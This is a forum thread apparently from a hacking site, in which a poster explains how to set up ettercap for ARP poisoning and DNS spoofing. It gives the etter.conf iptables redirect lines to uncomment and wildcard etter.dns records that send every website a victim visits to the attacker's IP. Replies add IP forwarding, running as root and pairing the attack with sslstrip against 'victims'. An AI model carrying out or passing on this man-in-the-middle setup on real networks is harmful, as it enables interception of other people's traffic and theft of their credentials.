Login Register






The issue regarding searched threads returning 404s has been fixed. My apologies. - NekoElf
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


Setting up ettercap. filter_list
Author
Message
Setting up ettercap. #1
First you need to edit you etter.conf in order to arp poison the network.
Code:
cd /etc
nano etter.conf

[Image: 77223217c.jpg]

Now look for this and remove the # sign.

Code:
#---------------
#     Linux
#---------------

# if you use ipchains:
   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


After you remove the # sign it should look like this.


[Image: 74946530.jpg]

Now look for this

[Image: 77101506.jpg]


and change to this


[Image: 67400483.jpg]


the when done press ctrl + o and thats it.

Now setting up the dms spoof plugin.
Code:
cd /usr/share/
nano etter.dns

Second thing in the etter.dns do this first erase everything then type what i have below here.

the * mean that any website they browse to will be directed to your local IP

*.*.* A 192.168.1.15 [your_ip]
*.* A 192.168.1.15
*.*.*.* A 192.168.1.15



Images where provided by 1llusion I had to do this in windows.

Reply

RE: Setting up ettercap. #2
wow thank you so much. Smile
What about the basics of backtrack? Smile
thank you.

Reply

RE: Setting up ettercap. #3
(04-09-2011, 07:00 PM)darkscorpion Wrote: wow thank you so much. Smile
What about the basics of backtrack? Smile
thank you.

Soon Soon I promise Its because I had an interview today then got rescheduled for tommorow I promise Alot more tutorials are comming and I have not forgotten you darkscorpian

Reply

RE: Setting up ettercap. #4
cd /usr/share/ is a typo.... edit it .. thanks

Reply

RE: Setting up ettercap. #5
Sorry I edited it

Reply

RE: Setting up ettercap. #6
Hey I just want to say I love your guides and tutorials! Now im familiar with uncommenting the two lines I always make sure that is done before using ettercap. I also issue the echo 1 > /proc/sys/net/ipv4/ip_forward command. But i'm just wondering exactly what you are doing when you change the ec_uid and ec_gid numbers to 0. I don't know what those really mean.

I also have another question odd maybe. I use ettercap and ssl strip sucessfully in Backtrack wired but I just cant get it to work wireless. I was told to simply use -i wlan0 (wlan0 is my wireless interface on my comp)when I run ettercap but it never works. I wont get any errors and it will say its arp poisoning victims fine but it just seems to not work. I know because I test on my own network. Could just be MY network being weird.
[Image: DOOM_banner.jpg]
A closed mouth says nothing wrong, A closed mind does nothing right.

Reply

RE: Setting up ettercap. #7
(04-15-2011, 03:59 AM).LiT Wrote: Hey I just want to say I love your guides and tutorials! Now im familiar with uncommenting the two lines I always make sure that is done before using ettercap. I also issue the echo 1 > /proc/sys/net/ipv4/ip_forward command. But i'm just wondering exactly what you are doing when you change the ec_uid and ec_gid numbers to 0. I don't know what those really mean.

I also have another question odd maybe. I use ettercap and ssl strip sucessfully in Backtrack wired but I just cant get it to work wireless. I was told to simply use -i wlan0 (wlan0 is my wireless interface on my comp)when I run ettercap but it never works. I wont get any errors and it will say its arp poisoning victims fine but it just seems to not work. I know because I test on my own network. Could just be MY network being weird.

When you change the ec_uid and ec_gid to zero its like running ettercap as admin.

Now when you run ettercap sometimes its unstable

Reply







Users browsing this thread: 3 Guest(s)